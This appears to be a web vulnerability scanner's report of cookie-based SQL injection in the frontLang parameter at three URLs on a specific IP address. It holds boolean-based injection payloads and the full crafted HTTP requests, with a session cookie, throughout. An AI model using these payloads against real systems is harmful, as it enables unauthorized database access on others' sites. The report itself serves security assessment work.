Cookie injection vulnerability detected at the target URL
URL http://202.201.39.48/index.php/tw/
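Request method GET
Affected parameter frontLang
Detection criteria 1. Based on the original request, modify the cookie value to construct a pseudo request and an error request, and send the pseudo request and the error request in turn;
2. If the response content of the original request is very similar to that of the pseudo request, and the response content of the original request differs greatly from that of the error request, the vulnerability is considered to exist.
Detection details 1. Construct URL: http://202.201.39.48/index.php/tw/ , set parameter frontLangzh-cn%25%27%20Or%201049=1050%20AnD%20%27%25%27=%27%25%27%20--%20 , and compare the similarity of the constructed request's response content with the original request's response content;
2. Construct URL: http://202.201.39.48/index.php/tw/ , set parameter frontLangzh-cn%25%27%20Or%201049=1049%20AnD%20%27%25%27=%27%25%27%20--%20 , and compare the similarity of the constructed request's response content with the original request's response content.
Request & response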
GET /index.php/tw/ HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/

GET /index.php/tw/ HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn%' Or 1049=1050 AnD '%'='%' --
  • Referer: http://202.201.39.48/

GET /index.php/tw/ HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/

GET /index.php/tw/ HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn%' Or 1049=1049 AnD '%'='%' --
  • Referer: http://202.201.39.48/

URL http://202.201.39.48/index.php/en/.git/index
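Request method GET
Affected parameter frontLang
Detection criteria 1. Based on the original request, modify the cookie value to construct a pseudo request and an error request, and send the pseudo request and the error request in turn;
2. If the response content of the original request is very similar to that of the pseudo request, and the response content of the original request differs greatly from that of the error request, the vulnerability is considered to exist.
Detection details 1. Construct URL: http://202.201.39.48/index.php/en/.git/index , set parameter frontLangzh-cn%27%20AnD%201227=1227%20AnD%20%271227%27=%271227%27%20--%20 , and compare the similarity of the constructed request's response content with the original request's response content;
2. Construct URL: http://202.201.39.48/index.php/en/.git/index , set parameter frontLangzh-cn%27%20AnD%201227=1227%20AnD%20%271227%27=%271228%27%20--%20 , and compare the similarity of the constructed request's response content with the original request's response content.
Request & response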
GET /index.php/en/.git/index HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/en/

GET /index.php/en/.git/index HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn' AnD 1227=1227 AnD '1227'='1227' --
  • Referer: http://202.201.39.48/index.php/en/

GET /index.php/en/.git/index HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/en/

GET /index.php/en/.git/index HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn' AnD 1227=1227 AnD '1227'='1228' --
  • Referer: http://202.201.39.48/index.php/en/

URL http://202.201.39.48/index.php/tw/index.asp
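Request method GET
Affected parameter frontLang
Detection criteria 1. Based on the original request, modify the cookie value to construct a pseudo request and an error request, and send the pseudo request and the error request in turn;
2. If the response content of the original request is very similar to that of the pseudo request, and the response content of the original request differs greatly from that of the error request, the vulnerability is considered to exist.
Detection details 1. Construct URL: http://202.201.39.48/index.php/tw/index.asp , set parameter frontLangzh-cn)%20AnD%201131=1131%20Or%20(1131=1132)%20--%20 , and compare the similarity of the constructed request's response content with the original request's response content;
2. Construct URL: http://202.201.39.48/index.php/tw/index.asp , set parameter frontLangzh-cn)%20AnD%201131=1131%20Or%20(1131=1131)%20--%20 , and compare the similarity of the constructed request's response content with the original request's response content.
Request & response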
GET /index.php/tw/index.asp HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/tw/

GET /index.php/tw/index.asp HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn) AnD 1131=1131 Or (1131=1132) --
  • Referer: http://202.201.39.48/index.php/tw/

GET /index.php/tw/index.asp HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/tw/

GET /index.php/tw/index.asp HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn) AnD 1131=1131 Or (1131=1131) --
  • Referer: http://202.201.39.48/index.php/tw/